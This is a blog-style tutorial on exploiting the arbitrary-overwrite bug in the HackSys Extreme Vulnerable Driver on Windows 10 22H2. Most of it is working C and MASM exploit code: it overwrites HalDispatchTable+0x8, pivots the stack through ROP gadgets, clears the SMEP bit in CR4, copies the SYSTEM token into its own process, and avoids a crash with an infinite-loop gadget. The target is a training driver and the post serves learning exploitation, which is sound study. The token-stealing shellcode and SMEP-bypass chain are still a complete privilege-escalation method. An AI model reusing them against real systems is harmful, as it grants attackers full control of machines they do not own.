HEVD on Win10 22H2 - Arbitrary Overwrite

Introduction

In order to get used to more modern kernel exploit mitigations, I decided to start digging into the HackSys Extreme Vulnerable Driver on an up-to-date version (22H2) of Windows 10. This post covers the thought-process, techniques used, and obstacles faced when exploiting an arbitrary write vulnerability on Windows 10 22H2.

Token stealing

In order to elevate the privileges of a process in windows, we will be using a concept called token stealing. Every process in windows has an Access Token. If we attach a kernel debugger we can find this token in a structure called the _EPROCESS structure at _EPROCESS+0x4b8

0: kd> dt nt!_EPROCESS
   +0x000 Pcb              : _KPROCESS
   +0x438 ProcessLock      : _EX_PUSH_LOCK
   +0x440 UniqueProcessId  : Ptr64 Void
...
   +0x4b0 ExceptionPortState : Pos 0, 3 Bits
   +0x4b8 Token            : _EX_FAST_REF

Using !process, we can find the _EPROCESS address of a process, after which we can see the contents of the access token.

0: kd> !process 0 0 system
PROCESS ffffdf88bce5d040
    SessionId: none  Cid: 0004    Peb: 00000000  ParentCid: 0000
    DirBase: 001ad000  ObjectTable: ffffcb02d9443c80  HandleCount: 2835.
    Image: System

0: kd> dt _EX_FAST_REF ffffdf88bce5d040+0x4b8
nt!_EX_FAST_REF
   +0x000 Object           : 0xffffcb02`d948c6ae Void
   +0x000 RefCnt           : 0y1110
   +0x000 Value            : 0xffffcb02`d948c6ae

As we can see the token is stored as a _EX_FAST_REF struct. This refers to the ‘Executive Fast Reference’ union which is something that stores data types at the same memory location. As we can see, the _EX_FAST_REF offsets remain the same for all data types within the structure.

By applying this knowledge, token stealing is nothing more than grabbing the value which exists at [_EPROCESS+0x4b8] and copying it to another [_EPROCESS+0x4b8]. In order to check if these claims are correct, we can simulate this in a kernel debugger.

First we open a command prompt.

Next, we grab the _EPROCESS of both the cmd.exe and system process.

0: kd> !process 0 0 cmd.exe
PROCESS ffffdf88c4ca0080
    SessionId: 1  Cid: 1cc8    Peb: 686edd000  ParentCid: 10d8
    DirBase: b0291000  ObjectTable: ffffcb02df0e8d80  HandleCount:  74.
    Image: cmd.exe

0: kd> !process 0 0 system
PROCESS ffffdf88bce5d040
    SessionId: none  Cid: 0004    Peb: 00000000  ParentCid: 0000
    DirBase: 001ad000  ObjectTable: ffffcb02d9443c80  HandleCount: 2878.
    Image: System

And finally, we write the system token value to the cmd.exe token location.

0: kd> eq ffffdf88c4ca0080+4b8 poi(ffffdf88bce5d040+4b8)

Thats it, you have now performed token stealing! But in order to be able to apply this same technique in code, we need to be able to get a reference to the _EPROCESS structure.

On 64-bit windows, we can use something called the GS segment register. This register holds a pointer to the _ETHREAD / _KTHREAD at GS:[0x188].

note: Just like the _EPROCESS / _KPROCESS structures, the _ETHREAD / _KTHREAD structures reside at the same address but just use different offsets.

0: kd> ? poi(gs:[0x188])
Evaluate expression: -8770215056896 = fffff806`06726a00

0: kd> !thread
THREAD fffff80606726a00  Cid 0000.0000  Teb: 0000000000000000 Win32Thread: 0000000000000000 RUNNING on processor 0
...
Owning Process            fffff80606723a00       Image:         Idle

As we can see, when we use the !thread command, it matches with the address pointed to by GS:[0x188] aswell as give us the owning process of the current thread. Looking at the _KTHREAD structure, it holds something called the ApcState at _KTHREAD+0x098.

0: kd> dt nt!_KTHREAD poi(gs:[0x188])
   +0x000 Header           : _DISPATCHER_HEADER
   +0x018 SListFaultAddress : (null) 
...
   +0x098 ApcState         : _KAPC_STATE
   +0x098 ApcStateFill     : [43]  "???"

If we have a look inside this structure, we can see that it actually holds a reference to the _KPROCESS structure at _KAPC_STATE+0x20, which as we noted earlier resides at the same address as the _EPROCESS structure.

0: kd> dt nt!_KAPC_STATE poi(gs:[0x188])+0x98
   +0x000 ApcListHead      : [2] _LIST_ENTRY [ 0xfffff806`06726a98 - 0xfffff806`06726a98 ]
   +0x020 Process          : 0xffffdf88`bce5d040 _KPROCESS
   +0x028 InProgressFlags  : 0 ''
...

So what does this give us?

This means we can use poi ( GS:[0x188] ) to get a pointer to the _ETHREAD / _KTHREAD. And use poi ( _KTHREAD+0xb8 ) (0x98 + 0x20) to get a pointer to the _EPROCESS / _KPROCESS. Basically, poi ( poi ( GS:[0x188] ) + 0xb8 ) should always give us the current _EPROCESS address, through code.

PROCESS ffffdf88bce5d040
    SessionId: none  Cid: 0004    Peb: 00000000  ParentCid: 0000
    DirBase: 001ad000  ObjectTable: ffffcb02d9443c80  HandleCount: 3067.
    Image: System

0: kd> ? poi ( poi ( GS:[0x188] ) + 0xb8 )
Evaluate expression: -35696598986688 = ffffdf88`bce5d040

SMEP & SMAP

Now that we know how to steal access tokens through code, we have to talk about the first obstacle we will encounter which is called Supervisor Mode Execution Prevention or SMEP and Supervisor Mode Access Prevention or SMAP. In a nutshell, these protections were created to prevent userland code/data to be executed/accessed from the kernel. If we look at many of the available HEVD writeups for windows 7, a valid attack flow would be:

Create a buffer containing shellcode
Overwrite some pointer that is called from the kernel with the pointer to your buffer
Profit

SMEP now prevents this, because the userland allocated buffer is not executable from the kernel.

How do we bypass SMEP?

SMEP and SMAP are enforced through the CR4 register. In fact, the 21st and 20th bit of the CR4 register.

note: Take endianness into account here, start counting from the right.

If we want to disable SMEP, we simply need to set the 20th bit of the CR4 register to 0.

0: kd> .formats 0y0000000000000000000000000000000000000000001001010000111011111000
Evaluate expression:
  Hex:     00000000`00250ef8

Thus, changing CR4 to 0x250ef8 would disable SMEP.

Arbitrary write

Now that we know what to do, lets see what we’re dealing with. The vulnerability within HEVD we are targeting is an arbitrary write, meaning we can write what we want wherever we want. We need to find a location within the kernel that upon writing specific value(s) to, allows us to eventually steal the system token.

HalDispatchTable

The HalDispatchTable is a table of pointers related to HAL functionality within the windows kernel of which its location is a static offset from the kernel base address.

0: kd> dps nt!HalDispatchTable 
fffff806`06600a60  00000000`00000004
fffff806`06600a68  fffff806`0638f9d0 nt!HaliQuerySystemInformation
fffff806`06600a70  fffff806`0612ad60 nt!HalpSetSystemInformation
fffff806`06600a78  fffff806`0611d780 nt!ArbAddReserved
fffff806`06600a80  00000000`00000000
fffff806`06600a88  fffff806`0628dd20 nt!HalExamineMBR
fffff806`06600a90  fffff806`0628dee0 nt!IoReadPartitionTable
fffff806`06600a98  fffff806`0628e160 nt!IoSetPartitionInformation
fffff806`06600aa0  fffff806`0628e3b0 nt!IoWritePartitionTable
fffff806`06600aa8  fffff806`05c53f00 nt!SC_DEVICE::GetStoragePropertyPost
fffff806`06600ab0  fffff806`05d99f00 nt!EmpCheckErrataList
fffff806`06600ab8  fffff806`05d99f00 nt!EmpCheckErrataList
fffff806`06600ac0  fffff806`0619b830 nt!HaliInitPnpDriver
fffff806`06600ac8  fffff806`061a3200 nt!HaliInitPowerManagement
fffff806`06600ad0  fffff806`05d78e90 nt!HalPnpGetDmaAdapter
fffff806`06600ad8  fffff806`061ca790 nt!HaliGetInterruptTranslator

HalDispatchTable + 0x8

A common method for kernel exploitation is to overwrite HalDispatchTable+0x8 with a pointer to a buffer containing shellcode. The HalDispatchTable+0x8 offset points to the nt!HaliQuerySystemInformation function which, if we look in the disassembler, is referenced by KeQueryIntervalProfile.

0: kd> ? nt!HalDispatchTable - nt
Evaluate expression: 12585568 = 00000000`00c00a60

Checking the _guard_dispatch_icall function, we can see that it jumps to the function loaded in RAX.

By tracing back the KeQueryIntervalProfile function, we can see it gets called from NtQueryIntervalProfile.

NtQueryIntervalProfile is a function we are able to call from a userland process. Thus, if we overwrite HalDispatchTable+0x8 and call NtQueryIntervalProfile, it will eventually end up calling our overwritten value.

note: The ntdll NtQueryIntervalProfile is different from the ntoskrnl NtQueryIntervalProfile. The ntdll NtQueryIntervalProfile function uses a syscall to make the jump into the kernel.

In order to overwrite HalDispatchTable+0x8, we first retrieve the kernel base address.

typedef void (*NtQueryIntervalProfile_t)(int arg1, int arg2);

typedef struct SYSTEM_MODULE {
	ULONG                Reserved1;
	ULONG                Reserved2;
#ifdef _WIN64
	ULONG				Reserved3;
#endif
	PVOID                ImageBaseAddress;
	ULONG                ImageSize;
	ULONG                Flags;
	WORD                 Id;
	WORD                 Rank;
	WORD                 w018;
	WORD                 NameOffset;
	CHAR                 Name[MAXIMUM_FILENAME_LENGTH];
}SYSTEM_MODULE, * PSYSTEM_MODULE;

typedef struct SYSTEM_MODULE_INFORMATION {
	ULONG                ModulesCount;
	SYSTEM_MODULE        Modules[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;

typedef enum _SYSTEM_INFORMATION_CLASS {
	SystemModuleInformation = 11
} SYSTEM_INFORMATION_CLASS;

typedef NTSTATUS(WINAPI* PNtQuerySystemInformation)(
	__in SYSTEM_INFORMATION_CLASS SystemInformationClass,
	__inout PVOID SystemInformation,
	__in ULONG SystemInformationLength,
	__out_opt PULONG ReturnLength
	);

PVOID GetKernelBase() {
	printf("[*] Getting the kernel base address");
	HMODULE ntdll = GetModuleHandle(TEXT("ntdll"));
	if (ntdll == NULL) {
		printf("[-] Failed to get a handle to ntdll\n");
		return 1;
	}
	PNtQuerySystemInformation query = (PNtQuerySystemInformation)GetProcAddress(ntdll, "NtQuerySystemInformation");
	if (query == NULL) {
		printf("[-] Failed to get the NtQuerySystemInformation address\n");
		return 1;
	}
	ULONG len = 0;
	query(SystemModuleInformation, NULL, 0, &len);

	PSYSTEM_MODULE_INFORMATION pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len);
	if (pModuleInfo == NULL) {
		printf("[-] Failed to get the PSYSTEM_MODULE_INFORMATION.\n");
		return 1;
	}
	NTSTATUS status = query(SystemModuleInformation, pModuleInfo, len, &len);

	if (status != (NTSTATUS)0x0) {
		printf("NtQuerySystemInformation failed with error code 0x%X\n", status);
		return 1;
	}
	printf("[*] ntoskrnl: %p\n", pModuleInfo->Modules[0].ImageBaseAddress);
	return pModuleInfo->Modules[0].ImageBaseAddress;
}

Using this base address, we can retrieve the HalDispatchTable by adding the static offset.

PVOID GetHalDispatchTable(PVOID KernelBase) {
	printf("[*] Getting the HalDispatchTable\n");
	PVOID HalDispatchTable = AddPtrOffset(KernelBase, 0x00c00a60);
	printf("[*] HalDispatchTable: %p\n", HalDispatchTable);
	return HalDispatchTable;
}

Eventually we can get the HaliQuerySystemInformation address by adding the 0x8 offset (this step is kind of irrelevant but has been seperated for clarity).

PVOID GetHaliQuerySystemInformation(PVOID HalDispatchTable) {
	printf("[*] Getting the HaliQuerySystemInformation address\n");
	PVOID HaliQuerySystemInformation = AddPtrOffset(HalDispatchTable, 0x8);
	printf("[*] HaliQuerySystemInformation: %p\n", HaliQuerySystemInformation);
	return HaliQuerySystemInformation;

We now have enough to overwrite the HaliQuerySystemInformation function. However, due to SMEP, we can’t overwrite this function with a userland buffer pointer without triggering a BSOD. Instead, we can overwrite this value with any kernel address that is executable. A common technique to use if we had control over the stack contents would be ROP, though we are only able to overwrite a single function pointer.

What if we can take control over the stack using a single ROP gadget?

Taking control over the stack

The plan

We figured out we are able to overwrite a function pointer with a valid kernel address in order to execute code. However, we are limited to a single gadget that has to give us control over the stack in order for us to continue our ROP chain. By overwriting indirectly callable kernel functions (such as nt!HaliQuerySystemInformation) that allow for arguments to be passed through, we might be able to find the right gadget that allows us to swap out an argument with the RSP register.

Lay of the land

Before we can start looking for gadgets we have to figure out how much control we have over the registers when jumping to the overwritten HalDispatchTable+0x8 pointer. In order to do so, we can simply overwrite it with a gadget containing an INT3 instruction. This allows us to quickly break once our gadget hits.

int WriteWhereWhat(HANDLE hFile, PVOID WriteWhere, PVOID WriteWhat) {
	PWRITE_WHAT_WHERE WriteWhatWhere = NULL;
	ULONG BytesReturned;

	WriteWhatWhere = (PWRITE_WHAT_WHERE)HeapAlloc(GetProcessHeap(),
		HEAP_ZERO_MEMORY,
		sizeof(WRITE_WHAT_WHERE));

	if (!WriteWhatWhere) {
		printf("[-] Failed To Allocate Memory: 0x%X\n", GetLastError());
		exit(EXIT_FAILURE);
	}
	else {
		printf("[+] Memory Allocated: 0x%p\n", WriteWhatWhere);
	}

	WriteWhatWhere->What = (PULONG_PTR)&WriteWhat;
	WriteWhatWhere->Where = (PULONG_PTR)WriteWhere;

	printf("[*] WriteWhereWhat(%p, %p, %p)\n", hFile, WriteWhere, &WriteWhat);

	int IOStatus = DeviceIoControl(hFile,
		HACKSYS_EVD_IOCTL_ARBITRARY_OVERWRITE,
		(LPVOID)WriteWhatWhere,
		sizeof(WRITE_WHAT_WHERE),
		NULL,
		0,
		&BytesReturned,
		NULL);

	HeapFree(GetProcessHeap(), 0, (LPVOID)WriteWhatWhere);
	WriteWhatWhere = NULL;
}



int main() {
	HANDLE hFile = NULL;
	LPCSTR FileName = (LPCSTR)DEVICE_NAME;

	// Get the kernel base address
	PVOID KernelBase = GetKernelBase();

	// Get the HalDispatchTable address
	PVOID HalDispatchTable = GetHalDispatchTable(KernelBase);

	// Get the HaliQuerySystemInformationAddress address
	PVOID HaliQuerySystemInformationAddress = GetHaliQuerySystemInformation(HalDispatchTable);


	__try {
		// Get the device handle
		printf("[+] Getting Device Driver Handle\n");
		printf("[+] Device Name: %s\n", FileName);

		hFile = GetDeviceHandle(FileName);

		if (hFile == INVALID_HANDLE_VALUE) {
			printf("\t\t[-] Failed Getting Device Handle: 0x%X\n", GetLastError());
			exit(EXIT_FAILURE);
		}
		else {
			printf("\t\t[+] Device Handle: 0x%X\n", hFile);
		}

		WriteWhereWhat(hFile, HaliQuerySystemInformationAddress, AddPtrOffset(KernelBase, 0x5bee0c)); // int3; ret; (1 found)

		typedef void (*PtrNtQueryIntervalProfile)(PVOID arg0, PVOID arg1);

		HMODULE ntdll = GetModuleHandle(TEXT("ntdll"));
		PtrNtQueryIntervalProfile _NtQueryIntervalProfile = (PtrNtQueryIntervalProfile)GetProcAddress(ntdll, "NtQueryIntervalProfile");
		if (_NtQueryIntervalProfile == NULL) {
			printf("[-] Failed to get address of NtQueryIntervalProfile.\n");
			exit(-1);
		}
		ULONG whatever;
		_NtQueryIntervalProfile(0x4141414141414141, 0x4242424242424242);
	}
	__except (EXCEPTION_EXECUTE_HANDLER) {
		printf("[-] Exception: 0x%X\n", GetLastError());
		exit(EXIT_FAILURE);
	}

	return EXIT_SUCCESS;
}

Executing the above code, we can see that it successfully triggers the INT3 instruction and breaks into our debugger. However, it does not seem like we have any direct control over registers.

We can break on NtQueryIntervalProfile to verify this.

bp nt!NtQueryIntervalProfile

It appears our arguments do make it into the NtQueryIntervalProfile function. Further analyzing the function tells us multiple things, it tells us that our second argument RDX is copied into RBX before both RCX and RDX are overwritten, as well as that the reason our arguments did not make it into the overwritten INT3 gadget is because an access violation is triggered (causing the exception handler to take over). The INT3 instruction we encountered was another process calling NtQueryIntervalProfile.

Due to the cmovb (Conditional mov if below) instruction, this code will fail if our second argument does not point to a readable userland buffer. In order to fix this, we can simply allocate some memory.

PVOID UserlandBuffer = HeapAlloc(GetProcessHeap(), NULL, 0x100);
if (UserlandBuffer == NULL) {
	printf("[-] Failed to allocate UserlandBuffer");
}
_NtQueryIntervalProfile(0xdeadbeefdeadbeef, &UserlandBuffer);

Running our exploit once again, we can see we now have control over the RBX register.

With direct control over the RBX register, we can look for gadgets that would allow us to transfer RBX into RSP. We can generate a list of gadgets using rp++

./rp-lin -f ntoskrnl.exe --va 0 -r 5 > rop.txt

Looking through the list, we find the following gadget.

0x434f8d: push qword[rbx]; jmp qword[rsi + 0x39]; (1 found)

Because this gadget ends with a JMP, we can chain an extra gadget if we use some custom dynamically generated shellcode in order to manually set and preserve RSI before the funciton call.

void SetRSI(PVOID BufferLocation) {
    printf("[*] SetRSI(%p)\n", BufferLocation);
    unsigned char code[12] = "\x48\xBE";
    append(code, (CHAR)((SIZE_T)BufferLocation & 0xFF));
    append(code, (CHAR)(((SIZE_T)BufferLocation & 0xff00) / 0x100));
    append(code, (CHAR)(((SIZE_T)BufferLocation & 0xff0000) / 0x10000));
    append(code, (CHAR)(((SIZE_T)BufferLocation & 0xff000000) / 0x1000000));
    append(code, (CHAR)(((SIZE_T)BufferLocation & 0xff00000000) / 0x100000000));
    append(code, (CHAR)(((SIZE_T)BufferLocation & 0xff0000000000) / 0x10000000000));
    append(code, (CHAR)(((SIZE_T)BufferLocation & 0xff000000000000) / 0x1000000000000));
    append(code, (CHAR)(((SIZE_T)BufferLocation & 0xff00000000000000) / 0x100000000000000));
    append(code, '\xC3');
    void* exec = VirtualAlloc(0, sizeof code, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(exec, code, sizeof code);
    ((void(*)())exec)();
    printf("[*] RSI should be set");
    return;
}

By placing a POP RSP gadget at the [RSI+39] location, we effectively create a PUSH [RBX], POP RSP chain, which allows us to set RSP to the value located in our controllable buffer. This ends up giving us control over the stack!

0x5b784e: pop rsp; ret; (1 found)

By using a seemingly unused read/writable location in the data section of ntoskrnl.exe, we can simply use this as our new custom stack location.

We can now implement these gadgets into our code so we can effectively start writing our ROP chain.

int main() {
	HANDLE hFile = NULL;
	LPCSTR FileName = (LPCSTR)DEVICE_NAME;

	// Get the kernel base address
	PVOID KernelBase = GetKernelBase();

	// Get the HalDispatchTable address
	PVOID HalDispatchTable = GetHalDispatchTable(KernelBase);

	// Get the HaliQuerySystemInformationAddress address
	PVOID HaliQuerySystemInformationAddress = GetHaliQuerySystemInformation(HalDispatchTable);

	// Create some distance between the RSI offset and our final buffer.
	PVOID RsiBufferLocation = AddPtrOffset(KernelBase, 0xCE9598 - 0x100);

	// Location of the RSI gadget
	PVOID RsiGadgetLocation = AddPtrOffset(RsiBufferLocation, 0x39);

	// Set the final buffer (ROP chain) location
	PVOID BufferLocation = AddPtrOffset(KernelBase, 0xCE9598);


	__try {
		// Get the device handle
		printf("[+] Getting Device Driver Handle\n");
		printf("[+] Device Name: %s\n", FileName);

		hFile = GetDeviceHandle(FileName);

		if (hFile == INVALID_HANDLE_VALUE) {
			printf("[-] Failed Getting Device Handle: 0x%X\n", GetLastError());
			exit(EXIT_FAILURE);
		}
		else {
			printf("[+] Device Handle: 0x%X\n", hFile);
		}

		// Overwrite HalDispatchTable entry with our first gadget
		WriteWhereWhat(hFile, HaliQuerySystemInformationAddress, AddPtrOffset(KernelBase, 0x434f8d)); // push qword[rbx]; jmp qword[rsi + 0x39]; (1 found)

		// Take control over the stack in our second gadget
		WriteWhereWhat(hFile, RsiGadgetLocation, AddPtrOffset(KernelBase, 0x5b784e)); // pop rsp; ret; (1 found)

		// Prepare our ROP chain
		WriteWhereWhat(hFile, BufferLocation, AddPtrOffset(KernelBase, 0x5bee0c)); // int3; ret; (1 found)
		WriteWhereWhat(hFile, (SIZE_T)BufferLocation + 0x8, AddPtrOffset(KernelBase, 0x5bee0c)); // int3; ret; (1 found)
		WriteWhereWhat(hFile, (SIZE_T)BufferLocation + 0x10, AddPtrOffset(KernelBase, 0x5bee0c)); // int3; ret; (1 found)
		WriteWhereWhat(hFile, (SIZE_T)BufferLocation + 0x18, AddPtrOffset(KernelBase, 0x5bee0c)); // int3; ret; (1 found)
		
		// Set RSI to the RsiBufferLocation
		SetRSI(RsiBufferLocation);

		typedef void (*PtrNtQueryIntervalProfile)(PVOID arg0, PVOID arg1);
		HMODULE ntdll = GetModuleHandle(TEXT("ntdll"));
		PtrNtQueryIntervalProfile _NtQueryIntervalProfile = (PtrNtQueryIntervalProfile)GetProcAddress(ntdll, "NtQueryIntervalProfile");
		if (_NtQueryIntervalProfile == NULL) {
			printf("[-] Failed to get address of NtQueryIntervalProfile.\n");
			exit(-1);
		}
		_NtQueryIntervalProfile(0xdeadbeefdeadbeef, &BufferLocation);

	}
	__except (EXCEPTION_EXECUTE_HANDLER) {
		printf("[-] Exception: 0x%X\n", GetLastError());
		exit(EXIT_FAILURE);
	}

	return EXIT_SUCCESS;
}

We can verify we have moved the stack pointer to our new ‘custom stack’ where we have written our INT3 gadgets, which we can now step through!

Disabling SMEP using ROP

Now that we are able to build and execute a ROP chain, we can use this chain in order to disable SMEP and execute our shellcode. Remember, SMEP is enforced through the 20th bit in the CR4 register, so all we have to do is flip this bit.

// Disable SMEP
WriteWhereWhat(hFile, (SIZE_T)BufferLocation + (offset += 0x8), AddPtrOffset(KernelBase, 0x51b5f5)); // pop rcx; ret; (1 found)
WriteWhereWhat(hFile, (SIZE_T)BufferLocation + (offset += 0x8), 0x250ef8); // Cr4 with SMEP disabled
WriteWhereWhat(hFile, (SIZE_T)BufferLocation + (offset += 0x8), AddPtrOffset(KernelBase, 0x9a63e3)); // mov cr4, rcx; ret; (1 found)

Along with setting the CR4 register, we can fix the HalDispatchTable value we have overwritten by finding the offset and writing that to the original location.

// Restore HaliQuerySystemInformation
WriteWhereWhat(hFile, (SIZE_T)BufferLocation + (offset += 0x8), AddPtrOffset(KernelBase, 0x57adf1)); // pop rcx; ret; (1 found)
WriteWhereWhat(hFile, (SIZE_T)BufferLocation + (offset += 0x8), AddPtrOffset(KernelBase, 0x098f9d0)); // Address of the HaliQuerySystemInformation function
WriteWhereWhat(hFile, (SIZE_T)BufferLocation + (offset += 0x8), AddPtrOffset(KernelBase, 0x5e602d)); // pop rdx; ret; (1 found)
WriteWhereWhat(hFile, (SIZE_T)BufferLocation + (offset += 0x8), HaliQuerySystemInformationAddress); // Location where HaliQuerySystemInformation should be
WriteWhereWhat(hFile, (SIZE_T)BufferLocation + (offset += 0x8), AddPtrOffset(KernelBase, 0x7567b8)); // xor eax, eax; mov qword[rdx], rcx; ret; (1 found)

Next we can simply return into a userland executable buffer in order to execute shellcode.

// Exec shellcode
WriteWhereWhat(hFile, (SIZE_T)BufferLocation + (offset += 0x8), ShellcodeBuffer); // Jump to our shellcode

This allows us to continue execution in our ShellcodeBuffer. In order to write shellcode I will be using MASM, which allows you to link functions written in assembly.

extern int shellcode_buf;

shellcode.asm

.code
shellcode_buf PROC
    mov  rax, gs:[0188h]   ; _KTHREAD
    mov rax,  QWORD PTR [rax + 0b8h]   ; Current _EPROCESS
    mov rbx, rax      ; Copy _EPROCESS to rbx
    __loop:
      mov rbx, [rbx + 0448h]    ; Go to next process through ActiveProcessLinks
      sub rbx, 0448h        ; Go back to current process (_EPROCESS)
      mov rcx, [rbx + 0440h]    ; Grab the PID
      cmp rcx, 04h      ; Check if PID matches SYSTEM PID
      jnz __loop      ; If not SYSTEM PID, jmp to __loop

    mov rcx, [rbx + 04b8h]    ; Grab the SYSTEM token
    mov [rax + 04b8h], rcx    ; Copy SYSTEM token to current process
    ret
  
shellcode_buf ENDP
END

Running the exploit with the above shellcode, we can confirm that we have successfully stolen the SYSTEM token!

There is one caveat however, if we continue the execution we will get a BSOD because the kernel will not be able to properly continue execution. In order to actually use our new token we need a method so that the kernel will not crash once we continue after our exploit.

Preventing a BSOD

A BSOD happens due to some exception in the kernel. One method of preventing such an exception is to simply never allow the thread to hit any exception-triggering code by triggering an infinite loop. This is not the cleanest method, but definitely one of the easier ones.

In order to trigger an infinite loop, we can store a JMP RAX gadget which we will jump to from inside of our shellcode.

// Store the JMP RAX
WriteWhereWhat(hFile, (SIZE_T)BufferLocation + (offset += 0x8), AddPtrOffset(KernelBase, 0x5e602d)); // pop rdx; ret; (1 found)
WriteWhereWhat(hFile, (SIZE_T)BufferLocation + (offset += 0x8), AddPtrOffset(KernelBase, 0x523fe0)); // jmp rax ; (1 found)

Inside of our shellcode, we will wipe the ROP chain we have just created, and trigger the infinite loop by storing the JMP RAX gadget in RAX and jumping to it.

shellcode.asm

.code
shellcode_buf PROC
    mov  rax, gs:[0188h]   ; _KTHREAD
    mov rax,  QWORD PTR [rax + 0b8h]   ; Current _EPROCESS
    mov rbx, rax      ; Copy _EPROCESS to rbx
    __loop:
        mov rbx, [rbx + 0448h]    ; Go to next process through ActiveProcessLinks
        sub rbx, 0448h        ; Go back to current process (_EPROCESS)
        mov rcx, [rbx + 0440h]    ; Grab the PID
        cmp rcx, 04h      ; Check if PID matches SYSTEM PID
        jnz __loop      ; If not SYSTEM PID, jmp to __loop

    mov rcx, [rbx + 04b8h]    ; Grab the SYSTEM token
    mov [rax + 04b8h], rcx    ; Copy SYSTEM token to current process

   ; Wipe our ROPchain
   mov rcx, 010h
    __wiper_loop:
        and QWORD PTR [rsp + 0], 0
        sub rsp, 08h
        dec rcx
        cmp rcx, 0
        jnz __wiper_loop

    mov rax, rdx ; Get the jmp rax gadget in rax
    mov rsp, rbp ; Fix our stack pointer to the original value
    sub rsp, 0118h
    jmp rax ; Start the infinite loop

shellcode_buf ENDP
END

HEVD_ArbitraryOverwrite.c

DWORD WINAPI ThreadFunc() {
	Sleep(500);
	WinExec("cmd", 1);
	return 0;
}

int main() {
	HANDLE hFile = NULL;
	LPCSTR FileName = (LPCSTR)DEVICE_NAME;

	// Get the kernel base address
	PVOID KernelBase = GetKernelBase();

	// Get the HalDispatchTable address
	PVOID HalDispatchTable = GetHalDispatchTable(KernelBase);

	// Get the HaliQuerySystemInformationAddress address
	PVOID HaliQuerySystemInformationAddress = GetHaliQuerySystemInformation(HalDispatchTable);

	// Create some distance between the RSI offset and our final buffer.
	PVOID RsiBufferLocation = AddPtrOffset(KernelBase, 0xCE9598 - 0x100);

	// Location of the RSI gadget
	PVOID RsiGadgetLocation = AddPtrOffset(RsiBufferLocation, 0x39);

	// Set the final buffer (ROP chain) location
	PVOID BufferLocation = AddPtrOffset(KernelBase, 0xCE9598);

	HANDLE execthread = CreateThread(NULL, 0, ThreadFunc, NULL, 0, NULL);


	__try {
		// Get the device handle
		printf("[+] Getting Device Driver Handle\n");
		printf("[+] Device Name: %s\n", FileName);

		hFile = GetDeviceHandle(FileName);

		if (hFile == INVALID_HANDLE_VALUE) {
			printf("[-] Failed Getting Device Handle: 0x%X\n", GetLastError());
			exit(EXIT_FAILURE);
		}
		else {
			printf("[+] Device Handle: 0x%X\n", hFile);
		}

		int offset = -0x8;


		PVOID ShellcodeBuffer = VirtualAlloc(0, 0x100, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
		if (ShellcodeBuffer == NULL) {
			printf("[-] Failed to allocate buffer for shellcode");
		}
		memcpy(ShellcodeBuffer, &shellcode_buf, 0x100);

		// Overwrite HalDispatchTable entry with our first gadget
		WriteWhereWhat(hFile, HaliQuerySystemInformationAddress, AddPtrOffset(KernelBase, 0x434f8d)); // push qword[rbx]; jmp qword[rsi + 0x39]; (1 found)

		// Take control over the stack in our second gadget
		WriteWhereWhat(hFile, RsiGadgetLocation, AddPtrOffset(KernelBase, 0x5b784e)); // pop rsp; ret; (1 found)

		// Prepare our ROP chain
		// Disable SMEP
		WriteWhereWhat(hFile, (SIZE_T)BufferLocation + (offset += 0x8), AddPtrOffset(KernelBase, 0x51b5f5)); // pop rcx; ret; (1 found)
		WriteWhereWhat(hFile, (SIZE_T)BufferLocation + (offset += 0x8), 0x250ef8); // Cr4 with SMEP disabled
		WriteWhereWhat(hFile, (SIZE_T)BufferLocation + (offset += 0x8), AddPtrOffset(KernelBase, 0x9a63e3)); // mov cr4, rcx; ret; (1 found)

		// Restore HaliQuerySystemInformation
		WriteWhereWhat(hFile, (SIZE_T)BufferLocation + (offset += 0x8), AddPtrOffset(KernelBase, 0x57adf1)); // pop rcx; ret; (1 found)
		WriteWhereWhat(hFile, (SIZE_T)BufferLocation + (offset += 0x8), AddPtrOffset(KernelBase, 0x098f9d0)); // Address of the HaliQuerySystemInformation function
		WriteWhereWhat(hFile, (SIZE_T)BufferLocation + (offset += 0x8), AddPtrOffset(KernelBase, 0x5e602d)); // pop rdx; ret; (1 found)
		WriteWhereWhat(hFile, (SIZE_T)BufferLocation + (offset += 0x8), HaliQuerySystemInformationAddress); // Location where HaliQuerySystemInformation should be
		WriteWhereWhat(hFile, (SIZE_T)BufferLocation + (offset += 0x8), AddPtrOffset(KernelBase, 0x7567b8)); // xor eax, eax; mov qword[rdx], rcx; ret; (1 found)

		// Store the JMP RAX
		WriteWhereWhat(hFile, (SIZE_T)BufferLocation + (offset += 0x8), AddPtrOffset(KernelBase, 0x5e602d)); // pop rdx; ret; (1 found)
		WriteWhereWhat(hFile, (SIZE_T)BufferLocation + (offset += 0x8), AddPtrOffset(KernelBase, 0x523fe0)); // jmp rax ; (1 found)

		// Exec shellcode
		WriteWhereWhat(hFile, (SIZE_T)BufferLocation + (offset += 0x8), ShellcodeBuffer); // Jump to our shellcode

		// Set RSI to the RsiBufferLocation
		SetRSI(RsiBufferLocation);

		typedef void (*PtrNtQueryIntervalProfile)(PVOID arg0, PVOID arg1);
		HMODULE ntdll = GetModuleHandle(TEXT("ntdll"));
		PtrNtQueryIntervalProfile _NtQueryIntervalProfile = (PtrNtQueryIntervalProfile)GetProcAddress(ntdll, "NtQueryIntervalProfile");
		if (_NtQueryIntervalProfile == NULL) {
			printf("[-] Failed to get address of NtQueryIntervalProfile.\n");
			exit(-1);
		}

		printf("[*] Calling NtQueryIntervalProfile\n\n");
		_NtQueryIntervalProfile(0xdeadbeefdeadbeef, &BufferLocation);

	}
	__except (EXCEPTION_EXECUTE_HANDLER) {
		printf("[-] Exception: 0x%X\n", GetLastError());
		exit(EXIT_FAILURE);
	}

	return EXIT_SUCCESS;
}

Profit

Full exploit code can be found here: HEVD

Wrapping up

This post has walked us through the process of exploiting the arbitrary overwrite vulnerability on Windows 10 22H2. The steps involved identifying that nt!HaliQuerySystemInformation was a viable in-direct callable function to use, finding the right ROP gadget in order to gain control over the stack, disabling SMEP in order to execute shellcode, and preventing a BSOD to occur.I want to give special credits to Connor Mcgarr for sharing great knowledge and resources on kernel exploitation & mitigations.